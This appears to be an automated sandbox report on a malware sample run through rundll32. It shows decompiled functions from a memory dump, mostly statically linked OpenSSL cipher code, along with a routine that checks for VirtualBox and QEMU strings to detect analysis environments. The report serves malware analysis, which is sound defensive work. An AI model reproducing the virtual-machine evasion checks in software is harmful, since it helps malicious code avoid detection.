                                        0x21ef3083971
                                        0x21ef3083977
                                        0x21ef3083983
                                        0x21ef3083988
                                        0x21ef3083993
                                        0x21ef30839a7
                                        0x21ef30839b6
                                        0x21ef30839c2
                                        0x21ef30839c4
                                        0x21ef30839c7
                                        0x21ef30839d5
                                        0x21ef30839db
                                        0x21ef30839e0
                                        0x21ef30839f8
                                        0x21ef30839fa
                                        0x21ef3083a00
                                        0x21ef3083a05
                                        0x21ef3083a09
                                        0x21ef3083a12
                                        0x21ef3083a1a
                                        0x21ef3083a26
                                        0x21ef3083a32
                                        0x21ef3083a34
                                        0x21ef3083a44
                                        0x21ef3083a53
                                        0x21ef3083a5b
                                        0x21ef3083a5d
                                        0x21ef3083a6f
                                        0x21ef3083a71
                                        0x21ef3083a79
                                        0x21ef3083a7e
                                        0x21ef3083a8b
                                        0x21ef3083a90
                                        0x21ef3083aa0
                                        0x21ef3083aa7
                                        0x21ef3083aad
                                        0x21ef3083abe
                                        0x21ef3083ac7
                                        0x21ef3083acb
                                        0x21ef3083acd
                                        0x21ef3083adf
                                        0x21ef3083ae8
                                        0x21ef3083af4
                                        0x21ef3083af6
                                        0x21ef3083b00
                                        0x21ef3083b0e
                                        0x21ef3083b15
                                        0x21ef3083b1b
                                        0x21ef3083b2e
                                        0x21ef3083b36
                                        0x21ef3083b38
                                        0x21ef3083b3f
                                        0x21ef3083b44
                                        0x21ef3083b59
                                        0x21ef3083b6d
                                        0x21ef3083b73
                                        0x21ef3083b7c
                                        0x21ef3083b80
                                        0x21ef3083b86
                                        0x21ef3083b8b
                                        0x21ef3083b90
                                        0x21ef3083ba5
                                        0x21ef3083bb7
                                        0x21ef3083bb9
                                        0x21ef3083bc1
                                        0x21ef3083bc5
                                        0x21ef3083bc8
                                        0x21ef3083bcc
                                        0x21ef3083bd2
                                        0x21ef3083bd4
                                        0x21ef3083be9
                                        0x21ef3083bf5
                                        0x21ef3083bf9
                                        0x21ef3083c01
                                        0x21ef3083c10
                                        0x21ef3083c12
                                        0x21ef3083c16
                                        0x21ef3083c22
                                        0x21ef3083c2a
                                        0x21ef3083c4c
                                        0x21ef3083c61

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $$..\..\openssl-1.1.0f\crypto\bn\bn_exp2.c$O
                                        • API String ID: 0-2637484880
                                        • Opcode ID: cc20bd6d27a031f10e03f053677d986ef24ef94761b25ffbbabf3cbe3a1a4b30
                                        • Instruction ID: da92defd8d1666bbf10a8735156bf9f317af1873b183ca0ea1dc0b27a43aee69
                                        • Opcode Fuzzy Hash: cc20bd6d27a031f10e03f053677d986ef24ef94761b25ffbbabf3cbe3a1a4b30
                                        • Instruction Fuzzy Hash: EE028475304B8186EE609A16AC583DB67D0F7E4BC4F5A5066EE4A87F86DF7CCA42C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30E6F10 Relevance: 4.1, Strings: 3, Instructions: 397COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 52%
                                        			E0000021E21EF30E6F10(void* __rax, long long __rbx, signed char* __rcx, long long __rdx, long long __rdi, long long __r8, long long __r9, long long __r12, long long __r13, long long __r14, long long __r15) {
				void* __rsi;
				void* __rbp;
				signed int _t135;
				void* _t137;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t148;
				intOrPtr _t151;
				intOrPtr _t155;
				intOrPtr _t158;
				signed int _t159;
				signed int _t167;
				void* _t171;
				signed int _t173;
				intOrPtr _t175;
				signed int _t187;
				void* _t197;
				void* _t202;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				void* _t235;
				intOrPtr* _t241;
				intOrPtr* _t247;
				intOrPtr* _t263;
				signed long long _t266;
				signed char* _t270;
				signed char* _t276;
				signed char* _t277;
				signed char* _t278;
				void* _t280;
				void* _t283;
				void* _t284;
				signed int _t287;
				long long _t302;

				_t302 = __r12;
				 *((long long*)(_t283 + 0x20)) = __r9;
				 *((long long*)(_t283 + 0x18)) = __r8;
				 *((long long*)(_t283 + 0x10)) = __rdx;
				_push(_t280);
				E0000021E21EF310C220();
				_t284 = _t283 - __rax;
				_t135 =  *__rcx & 0x000000ff;
				 *((intOrPtr*)(_t284 + 0xf0)) = 0;
				 *((intOrPtr*)(_t284 + 0x64)) = 1;
				if (_t135 == 0) goto 0xf30e75b6;
				 *((long long*)(_t284 + 0xd0)) = __rbx;
				 *((long long*)(_t284 + 0xc8)) = __rdi;
				 *((long long*)(_t284 + 0xc0)) = __r12;
				 *((long long*)(_t284 + 0xb8)) = __r13;
				 *((long long*)(_t284 + 0xb0)) = __r14;
				 *((long long*)(_t284 + 0xa8)) = __r15;
				if (_t135 != 0x2d) goto 0xf30e702a;
				 *((intOrPtr*)(_t284 + 0x90)) = 3;
				_t270 =  &(__rcx[1]);
				 *((intOrPtr*)(_t284 + 0x8c)) = 3;
				r14d = 3;
				 *((intOrPtr*)(_t284 + 0x88)) = r14d;
				r10d = 0;
				r11d = 0;
				 *(_t284 + 0x78) = r10d;
				 *(_t284 + 0x70) = r11d;
				r8d = 0;
				 *(_t284 + 0x74) = 0;
				 *(_t284 + 0x68) = r8d;
				 *(_t284 + 0x6c) = 0;
				 *((intOrPtr*)(_t284 + 0x60)) = 0;
				r12d = 0;
				 *(_t284 + 0x80) = _t270;
				_t197 = __rdx - 0x2d - 0x2d;
				if (_t197 > 0) goto 0xf30e7014;
				asm("dec ecx");
				if (_t197 < 0) goto 0xf30e701f;
				_t137 = __rdx - 0x61;
				if (_t137 - 0x19 > 0) goto 0xf30e70e4;
				r12d = r12d + 1;
				_t281 = _t280 + 1;
				goto 0xf30e7000;
				if (_t137 != 0x2b) goto 0xf30e7052;
				 *((intOrPtr*)(_t284 + 0x90)) = 4;
				 *((intOrPtr*)(_t284 + 0x8c)) = 4;
				r14d = 4;
				goto 0xf30e6fbb;
				if (_t137 != 0x21) goto 0xf30e707a;
				 *((intOrPtr*)(_t284 + 0x90)) = 2;
				 *((intOrPtr*)(_t284 + 0x8c)) = 2;
				r14d = 2;
				goto 0xf30e6fbb;
				if (_t137 != 0x40) goto 0xf30e70a2;
				 *((intOrPtr*)(_t284 + 0x90)) = 5;
				 *((intOrPtr*)(_t284 + 0x8c)) = 5;
				r14d = 5;
				goto 0xf30e6fbb;
				 *((intOrPtr*)(_t284 + 0x90)) = 1;
				r14d = 1;
				 *((intOrPtr*)(_t284 + 0x88)) = r14d;
				 *((intOrPtr*)(_t284 + 0x8c)) = 1;
				_t202 = _t137 - 0x3b;
				if (_t202 > 0) goto 0xf30e6fc3;
				asm("dec ecx");
				if (_t202 >= 0) goto 0xf30e6fc3;
				goto 0xf30e74e3;
				if (r12d == 0) goto 0xf30e73bc;
				if (r14d == 5) goto 0xf30e73ac;
				if (( *_t270 & 0x000000ff) != 0x2b) goto 0xf30e7107;
				r13d = 1;
				_t276 =  &(_t270[6]);
				goto 0xf30e710a;
				r13d = 0;
				_t241 =  *((intOrPtr*)(_t284 + 0x108));
				r14d = 0;
				r15d = 0;
				 *((intOrPtr*)(_t284 + 0xf0)) = r14d;
				if ( *_t241 == __rdi) goto 0xf30e718a;
				_t247 = _t241;
				_t287 = r12d;
				if (E0000021E21EF3112570(_t171, _t270,  *((intOrPtr*)( *_t247 + 8)), _t287) != 0) goto 0xf30e7157;
				if ( *((intOrPtr*)( *((intOrPtr*)( *_t247 + 8)) + _t280 + 1)) == r15b) goto 0xf30e71e6;
				_t243 =  *((intOrPtr*)(_t284 + 0x108));
				_t266 = __rdi + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x108)) + _t266 * 8)) != 0xfff11ffb) goto 0xf30e7130;
				r8d =  *(_t284 + 0x68);
				r10d =  *(_t284 + 0x78);
				r11d =  *(_t284 + 0x70);
				r14d = r15d;
				if ( *((intOrPtr*)(_t284 + 0x8c)) != 5) goto 0xf30e752a;
				if (r12d != 8) goto 0xf30e741f;
				r8d = r12d;
				if (E0000021E21EF3112570( *((intOrPtr*)(_t284 + 0x60)),  *(_t284 + 0x80), "STRENGTH", _t287) != 0) goto 0xf30e7470;
				E0000021E21EF30E75D0(_t243, _t243 + _t266 * 8,  *((intOrPtr*)(_t284 + 0xf8)),  *((intOrPtr*)(_t284 + 0x100)), _t266, _t276, _t280 + 1);
				goto 0xf30e7493;
				r15d = 1;
				r10d =  *(_t284 + 0x78);
				_t263 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x108)) + _t266 * 8));
				_t141 =  *(_t263 + 0x14);
				if (_t141 == 0) goto 0xf30e722f;
				_t214 = r10d;
				if (_t214 == 0) goto 0xf30e7228;
				r10d = r10d & _t141;
				 *(_t284 + 0x78) = r10d;
				if (_t214 != 0) goto 0xf30e722f;
				r8d =  *(_t284 + 0x68);
				r15d = 0;
				goto 0xf30e717e;
				r10d = _t141;
				 *(_t284 + 0x78) = _t141;
				_t142 =  *(_t263 + 0x18);
				r11d =  *(_t284 + 0x70);
				if (_t142 == 0) goto 0xf30e7266;
				_t216 = r11d;
				if (_t216 == 0) goto 0xf30e725f;
				r11d = r11d & _t142;
				 *(_t284 + 0x70) = r11d;
				if (_t216 != 0) goto 0xf30e7266;
				r8d =  *(_t284 + 0x68);
				r15d = 0;
				goto 0xf30e7183;
				r11d = _t142;
				 *(_t284 + 0x70) = _t142;
				_t143 =  *(_t263 + 0x1c);
				_t167 =  *(_t284 + 0x74);
				if (_t143 == 0) goto 0xf30e7298;
				_t218 = _t167;
				if (_t218 == 0) goto 0xf30e7292;
				 *(_t284 + 0x74) = _t167 & _t143;
				if (_t218 != 0) goto 0xf30e7298;
				r8d =  *(_t284 + 0x68);
				r15d = 0;
				goto 0xf30e7187;
				 *(_t284 + 0x74) = _t143;
				_t144 =  *(_t263 + 0x20);
				_t187 =  *(_t284 + 0x6c);
				if (_t144 == 0) goto 0xf30e72cd;
				_t220 = _t187;
				if (_t220 == 0) goto 0xf30e72c7;
				 *(_t284 + 0x6c) = _t187 & _t144;
				if (_t220 != 0) goto 0xf30e72cd;
				r8d =  *(_t284 + 0x68);
				r15d = 0;
				r14d = r15d;
				goto 0xf30e718e;
				 *(_t284 + 0x6c) = _t144;
				_t173 =  *(_t263 + 0x34);
				r8d =  *(_t284 + 0x68);
				if (_t220 == 0) goto 0xf30e730f;
				if ((r8b & 0x0000001f) == 0) goto 0xf30e7308;
				_t148 = _t173 | 0xffffffe0;
				r8d = r8d & _t148;
				 *(_t284 + 0x68) = r8d;
				_t222 = r8b & 0x0000001f;
				if (_t222 != 0) goto 0xf30e730f;
				r15d = 0;
				r14d = r15d;
				goto 0xf30e718e;
				r8d = _t148;
				 *(_t284 + 0x68) = _t148;
				if (_t222 == 0) goto 0xf30e7337;
				if ((r8b & 0x00000020) == 0) goto 0xf30e732f;
				r8d = r8d & (_t173 | 0xffffffdf);
				 *(_t284 + 0x68) = r8d;
				if ((r8b & 0x00000020) == 0) goto 0xf30e72f5;
				goto 0xf30e7337;
				r8d = r8d | _t173 & 0x00000020;
				 *(_t284 + 0x68) = r8d;
				if ( *_t263 == 0) goto 0xf30e734a;
				r14d =  *((intOrPtr*)(_t263 + 0x10));
				 *((intOrPtr*)(_t284 + 0xf0)) = r14d;
				goto 0xf30e7375;
				_t151 =  *((intOrPtr*)(_t263 + 0x24));
				if (_t151 == 0) goto 0xf30e736d;
				_t175 =  *((intOrPtr*)(_t284 + 0x60));
				if (_t175 == 0) goto 0xf30e735d;
				if (_t175 != _t151) goto 0xf30e7399;
				r14d =  *((intOrPtr*)(_t284 + 0xf0));
				 *((intOrPtr*)(_t284 + 0x60)) = _t151;
				goto 0xf30e7379;
				r14d =  *((intOrPtr*)(_t284 + 0xf0));
				if (r13d == 0) goto 0xf30e7412;
				r14d =  *((intOrPtr*)(_t284 + 0x88));
				goto 0xf30e6ff0;
				r15d = 0;
				r14d = r15d;
				goto 0xf30e7192;
				r14d =  *((intOrPtr*)(_t284 + 0xf0));
				r15d = 0;
				goto 0xf30e718e;
				 *((intOrPtr*)(_t284 + 0x20)) = 0x41c;
				_t108 = _t263 + 0x32; // 0x118
				r8d = _t108;
				E0000021E21EF30222D0(0x14, 0xe6, r13d, _t243, _t243 + _t266 * 8,  *((intOrPtr*)(_t284 + 0xf8)), _t263, _t276, _t280 + 1, "..\\..\\openssl-1.1.0f\\ssl\\ssl_ciph.c");
				r8d =  *(_t284 + 0x68);
				r15d = 0;
				r10d =  *(_t284 + 0x78);
				_t277 =  &(_t276[1]);
				r11d =  *(_t284 + 0x70);
				r14d =  *((intOrPtr*)(_t284 + 0xf0));
				 *((intOrPtr*)(_t284 + 0x64)) = 0;
				goto 0xf30e7196;
				goto 0xf30e7192;
				if (r12d != 0xa) goto 0xf30e7470;
				_t117 = _t302 - 1; // -1
				r8d = _t117;
				if (E0000021E21EF3112570( *((intOrPtr*)(_t284 + 0x60)),  *(_t284 + 0x80), "SECLEVEL=", _t287) != 0) goto 0xf30e7470;
				_t155 = ( *(_t284 + 0x80))[9] - 0x30;
				if (_t155 - 5 > 0) goto 0xf30e7466;
				 *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x110)) + 0x1c0)) = _t155;
				goto 0xf30e7493;
				 *((intOrPtr*)(_t284 + 0x20)) = 0x4b4;
				goto 0xf30e7478;
				 *((intOrPtr*)(_t284 + 0x20)) = 0x4ba;
				r8d = 0x118;
				_t125 = _t287 - 0x32; // -51
				E0000021E21EF30222D0(0x14, _t125, _t155 - 5,  *(_t284 + 0x80), _t243 + _t266 * 8,  *((intOrPtr*)(_t284 + 0x110)), "SECLEVEL=", _t277, _t281, "..\\..\\openssl-1.1.0f\\ssl\\ssl_ciph.c");
				_t158 =  !=  ? 0 : 0;
				 *((intOrPtr*)(_t284 + 0x64)) = _t158;
				_t159 =  *_t277 & 0x000000ff;
				if (_t159 == 0) goto 0xf30e74ca;
				_t235 = _t159 - 0x3b;
				if (_t235 > 0) goto 0xf30e74bf;
				asm("dec ecx");
				if (_t235 < 0) goto 0xf30e74ca;
				_t278 =  &(_t277[1]);
				if ((_t277[1] & 0x000000ff) != 0) goto 0xf30e74b1;
				if ( *_t278 == 0) goto 0xf30e74ee;
				if (( *_t278 & 0x000000ff) != 0) goto 0xf30e6f94;
				return _t158;
			}










































                                        0x21ef30e6f10
                                        0x21ef30e6f10
                                        0x21ef30e6f15
                                        0x21ef30e6f1a
                                        0x21ef30e6f1f
                                        0x21ef30e6f26
                                        0x21ef30e6f2b
                                        0x21ef30e6f2e
                                        0x21ef30e6f36
                                        0x21ef30e6f44
                                        0x21ef30e6f4a
                                        0x21ef30e6f50
                                        0x21ef30e6f58
                                        0x21ef30e6f60
                                        0x21ef30e6f68
                                        0x21ef30e6f7a
                                        0x21ef30e6f82
                                        0x21ef30e6f96
                                        0x21ef30e6f9c
                                        0x21ef30e6fa7
                                        0x21ef30e6faa
                                        0x21ef30e6fb5
                                        0x21ef30e6fbb
                                        0x21ef30e6fc5
                                        0x21ef30e6fc8
                                        0x21ef30e6fcb
                                        0x21ef30e6fd2
                                        0x21ef30e6fd7
                                        0x21ef30e6fda
                                        0x21ef30e6fde
                                        0x21ef30e6fe3
                                        0x21ef30e6fe7
                                        0x21ef30e6ff0
                                        0x21ef30e6ff3
                                        0x21ef30e7006
                                        0x21ef30e7008
                                        0x21ef30e700e
                                        0x21ef30e7012
                                        0x21ef30e7014
                                        0x21ef30e7019
                                        0x21ef30e7022
                                        0x21ef30e7025
                                        0x21ef30e7028
                                        0x21ef30e702c
                                        0x21ef30e702e
                                        0x21ef30e703c
                                        0x21ef30e7047
                                        0x21ef30e704d
                                        0x21ef30e7054
                                        0x21ef30e7056
                                        0x21ef30e7064
                                        0x21ef30e706f
                                        0x21ef30e7075
                                        0x21ef30e707c
                                        0x21ef30e707e
                                        0x21ef30e708c
                                        0x21ef30e7097
                                        0x21ef30e709d
                                        0x21ef30e70a2
                                        0x21ef30e70ad
                                        0x21ef30e70b3
                                        0x21ef30e70bb
                                        0x21ef30e70c6
                                        0x21ef30e70c8
                                        0x21ef30e70d2
                                        0x21ef30e70d6
                                        0x21ef30e70df
                                        0x21ef30e70e7
                                        0x21ef30e70f1
                                        0x21ef30e70fa
                                        0x21ef30e70fc
                                        0x21ef30e7102
                                        0x21ef30e7105
                                        0x21ef30e7107
                                        0x21ef30e710a
                                        0x21ef30e7112
                                        0x21ef30e7115
                                        0x21ef30e7118
                                        0x21ef30e7125
                                        0x21ef30e712a
                                        0x21ef30e7133
                                        0x21ef30e7144
                                        0x21ef30e7151
                                        0x21ef30e7157
                                        0x21ef30e715f
                                        0x21ef30e7172
                                        0x21ef30e7174
                                        0x21ef30e7179
                                        0x21ef30e717e
                                        0x21ef30e7187
                                        0x21ef30e719e
                                        0x21ef30e71aa
                                        0x21ef30e71b0
                                        0x21ef30e71c4
                                        0x21ef30e71da
                                        0x21ef30e71e1
                                        0x21ef30e71ee
                                        0x21ef30e71f4
                                        0x21ef30e71f9
                                        0x21ef30e71fd
                                        0x21ef30e7202
                                        0x21ef30e7204
                                        0x21ef30e7207
                                        0x21ef30e7209
                                        0x21ef30e720c
                                        0x21ef30e7211
                                        0x21ef30e7213
                                        0x21ef30e7218
                                        0x21ef30e7223
                                        0x21ef30e7228
                                        0x21ef30e722b
                                        0x21ef30e722f
                                        0x21ef30e7232
                                        0x21ef30e7239
                                        0x21ef30e723b
                                        0x21ef30e723e
                                        0x21ef30e7240
                                        0x21ef30e7243
                                        0x21ef30e7248
                                        0x21ef30e724a
                                        0x21ef30e724f
                                        0x21ef30e725a
                                        0x21ef30e725f
                                        0x21ef30e7262
                                        0x21ef30e7266
                                        0x21ef30e7269
                                        0x21ef30e726f
                                        0x21ef30e7271
                                        0x21ef30e7273
                                        0x21ef30e7277
                                        0x21ef30e727b
                                        0x21ef30e727d
                                        0x21ef30e7282
                                        0x21ef30e728d
                                        0x21ef30e7294
                                        0x21ef30e7298
                                        0x21ef30e729b
                                        0x21ef30e72a1
                                        0x21ef30e72a3
                                        0x21ef30e72a5
                                        0x21ef30e72a9
                                        0x21ef30e72ad
                                        0x21ef30e72af
                                        0x21ef30e72b4
                                        0x21ef30e72bf
                                        0x21ef30e72c2
                                        0x21ef30e72c9
                                        0x21ef30e72cd
                                        0x21ef30e72d2
                                        0x21ef30e72da
                                        0x21ef30e72e0
                                        0x21ef30e72e4
                                        0x21ef30e72e7
                                        0x21ef30e72ea
                                        0x21ef30e72ef
                                        0x21ef30e72f3
                                        0x21ef30e72fd
                                        0x21ef30e7300
                                        0x21ef30e7303
                                        0x21ef30e7308
                                        0x21ef30e730b
                                        0x21ef30e7314
                                        0x21ef30e731a
                                        0x21ef30e731f
                                        0x21ef30e7322
                                        0x21ef30e732b
                                        0x21ef30e732d
                                        0x21ef30e732f
                                        0x21ef30e7332
                                        0x21ef30e733a
                                        0x21ef30e733c
                                        0x21ef30e7340
                                        0x21ef30e7348
                                        0x21ef30e734a
                                        0x21ef30e734f
                                        0x21ef30e7351
                                        0x21ef30e7357
                                        0x21ef30e735b
                                        0x21ef30e735d
                                        0x21ef30e7367
                                        0x21ef30e736b
                                        0x21ef30e736d
                                        0x21ef30e737c
                                        0x21ef30e7382
                                        0x21ef30e7394
                                        0x21ef30e73a1
                                        0x21ef30e73a4
                                        0x21ef30e73a7
                                        0x21ef30e73ac
                                        0x21ef30e73b4
                                        0x21ef30e73b7
                                        0x21ef30e73c1
                                        0x21ef30e73d5
                                        0x21ef30e73d5
                                        0x21ef30e73d9
                                        0x21ef30e73de
                                        0x21ef30e73ed
                                        0x21ef30e73f0
                                        0x21ef30e73f5
                                        0x21ef30e73f8
                                        0x21ef30e7401
                                        0x21ef30e7409
                                        0x21ef30e740d
                                        0x21ef30e741a
                                        0x21ef30e7423
                                        0x21ef30e7425
                                        0x21ef30e7425
                                        0x21ef30e743b
                                        0x21ef30e7449
                                        0x21ef30e744f
                                        0x21ef30e745e
                                        0x21ef30e7464
                                        0x21ef30e7466
                                        0x21ef30e746e
                                        0x21ef30e7470
                                        0x21ef30e7478
                                        0x21ef30e748a
                                        0x21ef30e748e
                                        0x21ef30e7497
                                        0x21ef30e749c
                                        0x21ef30e74a0
                                        0x21ef30e74a5
                                        0x21ef30e74b1
                                        0x21ef30e74b3
                                        0x21ef30e74b9
                                        0x21ef30e74bd
                                        0x21ef30e74c3
                                        0x21ef30e74c8
                                        0x21ef30e74cd
                                        0x21ef30e74e8
                                        0x21ef30e7529

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH
                                        • API String ID: 0-486191471
                                        • Opcode ID: 8eb8855e299199fa78fa6bf37b292dc14f7b3d3d1f1b00921f68cae06a8a6809
                                        • Instruction ID: 997754c69fd0a877130f12b8019cb5ecdbf22a2987dbed0fa8f076f6842a47bb
                                        • Opcode Fuzzy Hash: 8eb8855e299199fa78fa6bf37b292dc14f7b3d3d1f1b00921f68cae06a8a6809
                                        • Instruction Fuzzy Hash: 6E025FB23182858AEB758E15E8447AFBBE5F3A4B84F114057EE9547E95DB3CC886CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301FFE0 Relevance: 3.8, Strings: 3, Instructions: 37COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: BMSR$QEMU$qemu
                                        • API String ID: 0-2187671315
                                        • Opcode ID: 9bbd8f77e21beda5b1a230b070378a9d317c7180325cd3574879d939862a6e66
                                        • Instruction ID: e295174b0337d1390a916a1e5e50228003bb52fba0139293d63e9672d9478b52
                                        • Opcode Fuzzy Hash: 9bbd8f77e21beda5b1a230b070378a9d317c7180325cd3574879d939862a6e66
                                        • Instruction Fuzzy Hash: 2601A73131038082EF50EB52B9C46DBA7E1E7A8BC4F455026AF0987F4AEA3CCD46C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301EF51 Relevance: 3.8, Strings: 3, Instructions: 35COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E0000021E21EF301EF51(void* __rax, void* __rbx, long long __rsi, intOrPtr _a48, long long _a56, void* _a64) {
				intOrPtr _t16;
				void* _t22;
				void* _t28;
				void* _t33;
				void* _t39;

				_t31 = __rsi;
				_t22 = __rbx;
				if (__rax == 0) goto 0xf301efbf;
				_a56 = __rsi;
				_t16 = _a48;
				r9d = _t16;
				if (E0000021E21EF3021320(__rax, __rbx, "VirtualBox", _t28, __rax, __rsi, _t33, __rax, _t39) != 0) goto 0xf301efad;
				r9d = _t16;
				if (E0000021E21EF3021320(E0000021E21EF3021320(__rax, __rbx, "VirtualBox", _t28, __rax, __rsi, _t33, __rax, _t39), _t22, "vbox", _t28, __rax, _t31, _t33, __rax, _t39) != 0) goto 0xf301efad;
				r9d = _t16;
				if (E0000021E21EF3021320(E0000021E21EF3021320(E0000021E21EF3021320(__rax, __rbx, "VirtualBox", _t28, __rax, __rsi, _t33, __rax, _t39), _t22, "vbox", _t28, __rax, _t31, _t33, __rax, _t39), _t22, "VBOX", _t28, __rax, _t31, _t33, __rax, _t39) == 0) goto 0xf301efb2;
				0xf3111fb0();
				return 1;
			}








                                        0x21ef301ef51
                                        0x21ef301ef51
                                        0x21ef301ef57
                                        0x21ef301ef59
                                        0x21ef301ef61
                                        0x21ef301ef6c
                                        0x21ef301ef79
                                        0x21ef301ef7b
                                        0x21ef301ef92
                                        0x21ef301ef94
                                        0x21ef301efab
                                        0x21ef301efb5
                                        0x21ef301efcb

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: VBOX$VirtualBox$vbox
                                        • API String ID: 0-1078916713
                                        • Opcode ID: 483c28d28c78ebee7fd5ef865e302de2355e6e87e320884380a1e2af5826f7e2
                                        • Instruction ID: 7d28d45d454fad02056b83bc79e6811206a416516b9291100c3265cb7143470e
                                        • Opcode Fuzzy Hash: 483c28d28c78ebee7fd5ef865e302de2355e6e87e320884380a1e2af5826f7e2
                                        • Instruction Fuzzy Hash: CD01623130428141EE50A712FD446DAA7E5E7A4BC8F464025EE099BF9AEA39D946C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3127160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem
                                        • String ID: GetSystemTimePreciseAsFileTime
                                        • API String ID: 2086374402-595813830
                                        • Opcode ID: 0c9a3d7744762a1f31ab0d55b459eefc88dabd928b301c7caa30f633a756dcee
                                        • Instruction ID: 8c53ff66476f93e9bbcfe5e5af217b5fb55f15a395a23ecaa708ef99636f9aed
                                        • Opcode Fuzzy Hash: 0c9a3d7744762a1f31ab0d55b459eefc88dabd928b301c7caa30f633a756dcee
                                        • Instruction Fuzzy Hash: 7CF0E530211A4591FE15DB55FD582EB53F1EB5ABC1F4650319D1A07F55DE3CC456C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3121E60 Relevance: 3.2, APIs: 2, Instructions: 191COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0000021E21EF3121E60(void* __ecx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a24, long long _a32) {
				void* _t9;
				void* _t13;

				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				if (__rdx != 0) goto 0xf3121e9a;
				return E0000021E21EF3121358(__ecx, _t9, _t13, __rdx);
			}





                                        0x21ef3121e60
                                        0x21ef3121e65
                                        0x21ef3121e6a
                                        0x21ef3121e7e
                                        0x21ef3121e99

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wcsftime$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4239037671-0
                                        • Opcode ID: 80730935346aab5924bd2850c5ff26b215035e503c7cbe009f67598e29617299
                                        • Instruction ID: 3ae6886bfc170e0e30fae1508779f6a94e060ac5f3426e03f18e531eb7c9b559
                                        • Opcode Fuzzy Hash: 80730935346aab5924bd2850c5ff26b215035e503c7cbe009f67598e29617299
                                        • Instruction Fuzzy Hash: 4F71AF3221478042FF78DA25A8493AF62F1F7A57A4F554225AF9983EDADF3CC413C604
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304A560 Relevance: 2.8, Strings: 2, Instructions: 293COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A560(long long _a40, long long _a48, intOrPtr _a72, long long _a88) {
				void* _t66;
				void* _t69;
				void* _t102;
				intOrPtr* _t104;
				signed char* _t105;
				void* _t106;
				void* _t107;
				signed char* _t111;
				long long _t128;
				long long _t132;
				long long _t134;
				void* _t138;

				E0000021E21EF310C220();
				_t106 = _t107;
				if (( *(_t107 + 0xc0) & 0x00000100) != 0) goto 0xf304aa42;
				_a88 = _t134;
				_a40 = _t128;
				E0000021E21EF303DA70(0x40);
				r9d = 0;
				E0000021E21EF3091460(_t104, _t106, _t106, _t104, _t132, _t134, _t106 + 0x110, _t138);
				if (E0000021E21EF308EA40(_t104, _t106) != 0) goto 0xf304a5b9;
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000040;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t104, _t106);
				if (_t104 == 0) goto 0xf304a62e;
				if ( *_t104 == 0) goto 0xf304a5e0;
				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000010;
				_t111 =  *(_t104 + 8);
				if (_t111 == 0) goto 0xf304a615;
				if ( *((intOrPtr*)(_t111 + 4)) == 0x102) goto 0xf304a603;
				if ( *_t104 == 0) goto 0xf304a603;
				 *((intOrPtr*)(_t106 + 0xb8)) = E0000021E21EF308C1F0(_t104, _t111);
				goto 0xf304a61f;
